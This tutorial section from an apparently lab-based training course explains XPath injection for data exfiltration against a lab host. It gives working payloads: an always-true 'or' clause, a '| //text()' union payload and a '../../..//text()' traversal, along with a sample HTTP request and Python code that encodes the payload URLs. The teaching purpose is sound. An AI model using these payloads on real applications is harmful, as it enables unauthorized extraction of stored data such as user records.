Injection Attacks  

XPath - Data Exfiltration


Having covered authentication bypass via XPath injection in the previous section, we now turn to data exfiltration. Specifically, we will discuss how to manipulate XPath queries so that they return arbitrary data from the XML document, using techniques similar to UNION-based SQL injection.


Simple Data Exfiltration

To demonstrate data exfiltration via XPath injection in a simple base scenario, let us consider a web application that allows us to query data about the streets in San Francisco. We can enter a search query and choose between a long and short street name. The web application displays all streets in San Francisco that match our query:

Looking at the request, we can see that the search query is sent in the GET parameter q, while our choice of a long/short street name is transmitted in the GET parameter f:

image

The web application returns all streets that contain our search query as a substring. The parameter f seems to control which property of the matching streets is displayed: either the complete street name or a shortened version. This reveals two node names: fullstreetname and streetname. To exploit an XPath injection vulnerability successfully, it is crucial to work out the structure of both the XPath query and the XML document it runs against, just as we would map out the query and schema when exploiting SQL injection.

From the web application's behavior, we can deduce information about the XPath query that is performed. Since we do not know the names of the element nodes in the XML document, we will denote the path with the single-character placeholder names a, b, c, and d. The query most likely looks like this:

/a/b/c[contains(d/text(), 'BAR')]/fullstreetname

Note: We do not know whether the depth of the XML schema is three, as depicted above (/a/b/c). We will discuss how to determine the schema depth in the next section.

In this case, the search string we provide in the GET parameter q is inserted in the predicate that filters the street name using the contains function. After that, the GET parameter f determines the property the web application displays from all matching streets, which is why it is appended at the end of the query.
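To make the deduced query construction concrete, here is a minimal sketch of how the server side might assemble the expression. The function name build_query is hypothetical, the node names a, b, c, and d are the same placeholders used above, and the real application (an index.php script) is not written in Python; this only illustrates the unsafe string concatenation.

```python
def build_query(q: str, f: str) -> str:
    """Hypothetical reconstruction of the server-side query building."""
    # q lands inside the string literal of contains(); f is appended as the
    # final location step. Neither value is escaped or validated, which is
    # what makes the injection possible. a, b, c, d are placeholder names.
    return f"/a/b/c[contains(d/text(), '{q}')]/{f}"


print(build_query("BAR", "fullstreetname"))
# prints: /a/b/c[contains(d/text(), 'BAR')]/fullstreetname
```

Because both parameters flow into the expression unchanged, each of them is a separate injection point: q inside the predicate, and f after it.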

From the above query, we know the XML document has to look similar to this (again, we do not know the node names, so we use the same placeholder names as above):

<a>
	<b>
		<c>
			<d>???</d>
			<streetname>BARCELONA</streetname>
			<fullstreetname>BARCELONA AVE</fullstreetname>
		</c>
	</b>
</a>

Confirming XPath Injection

We can confirm XPath injection by sending the payload SOMETHINGINVALID') or ('1'='1 in the q parameter. This would result in the following XPath query:

/a/b/c[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]

While our provided substring is invalid, the injected or clause evaluates to true such that the predicate becomes universally true. Therefore, it matches all nodes at that depth. If we send this payload, the web application responds with all street names, thus confirming the XPath injection vulnerability:

image
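The effect of the confirmation payload can be reproduced offline by substituting it into an assumed query template. The template and the helper name build_query are hypothetical reconstructions, with f left at fullstreetname; the point is only to show how the injected quote and parenthesis close the original string literal and function call.

```python
def build_query(q: str, f: str) -> str:
    # Hypothetical template with placeholder node names a, b, c, d.
    return f"/a/b/c[contains(d/text(), '{q}')]/{f}"


# The payload closes the string literal and the contains() call, then adds
# a condition that is always true. The template's own trailing ') completes
# the injected ('1'='1 comparison, so the expression stays well formed.
payload = "SOMETHINGINVALID') or ('1'='1"
query = build_query(payload, "fullstreetname")

print(query)
# prints: /a/b/c[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]/fullstreetname
```

Note that the payload deliberately omits the final quote and parenthesis, since the surrounding query supplies them.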

Exfiltrating Data

How can we exploit this XPath injection to exfiltrate data apart from the street data? The easiest way is to construct a query that returns the entire XML document so that we can search it for interesting information. There are multiple different ways to achieve this. However, the simplest is probably to append a new query that returns all text nodes. We can do this with a request like this:

GET /index.php?q=SOMETHINGINVALID&f=fullstreetname+|+//text() HTTP/1.1
Host: xpath-exfil.htb


The web application will then execute the following query:

/a/b/c[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | //text()

We are appending a second query with the | operator, similar to a UNION-based SQL injection. The second query, //text(), returns all text nodes in the XML document, so the response contains all data stored in it. Depending on the size of the XML document, the response can be large, and it may take some time to look through the data carefully. In our example, we can find a user data set at the end of the document, after the data set containing information about the streets of San Francisco:

image

Thus, we successfully exploited XPath injection to exfiltrate the entire XML document.
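To see why //text() leaks everything, the following sketch approximates it on a small sample document. The document is entirely hypothetical: the users, user, name, and password node names and all values are invented for illustration and do not come from the target. Python's standard library does not implement text() or the | operator, so itertext() is used here as a stand-in for selecting every text node.

```python
import xml.etree.ElementTree as ET

# Hypothetical document; node names and values are invented for illustration.
SAMPLE = """
<a>
  <b>
    <c>
      <d>BARCELONA</d>
      <streetname>BARCELONA</streetname>
      <fullstreetname>BARCELONA AVE</fullstreetname>
    </c>
  </b>
  <users>
    <user>
      <name>example-user</name>
      <password>example-password</password>
    </user>
  </users>
</a>
"""

root = ET.fromstring(SAMPLE)

# itertext() yields every text node below the root in document order, which
# approximates what //text() selects. Whitespace-only nodes are dropped.
all_text = [t.strip() for t in root.itertext() if t.strip()]

print(all_text)
# prints: ['BARCELONA', 'BARCELONA', 'BARCELONA AVE', 'example-user', 'example-password']
```

The street filter plays no role in this result, which is why unrelated data sets in the same document are returned alongside the street names.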

We could also achieve the same result by using this payload in the q parameter: SOMETHINGINVALID') or ('1'='1 and setting the f parameter to ../../..//text(). This would result in the following XPath query:

/a/b/c[contains(d/text(), 'SOMETHINGINVALID') or ('1'='1')]/../../..//text()

The predicate is universally true due to our injected or clause. Furthermore, our payload injected into the f parameter moves back up to the document's root and selects all text nodes, just like our previous payload. Thus, this query also returns the entire XML document.
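Both payload variants can be turned into request URLs with proper encoding. The sketch below uses the host and path from the request shown earlier; the http scheme and the variant labels union and traversal are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Host and path are taken from the example request; the scheme is assumed.
BASE = "http://xpath-exfil.htb/index.php"

variants = {
    # Appends a second query via the | operator in the f parameter.
    "union": {"q": "SOMETHINGINVALID", "f": "fullstreetname | //text()"},
    # Makes the predicate always true, then climbs to the root via f.
    "traversal": {"q": "SOMETHINGINVALID') or ('1'='1", "f": "../../..//text()"},
}

# urlencode() percent-encodes quotes, slashes, parentheses, and the pipe,
# and turns spaces into '+', so the payloads survive transport intact.
urls = {name: f"{BASE}?{urlencode(params)}" for name, params in variants.items()}

for name, url in urls.items():
    print(name, url)

# Round-trip check: decoding each query string returns the original payloads.
for name, url in urls.items():
    decoded = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    assert decoded == variants[name]
```

Encoding the payloads programmatically avoids subtle breakage from unescaped quotes or spaces when the requests are sent with a script rather than a browser.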
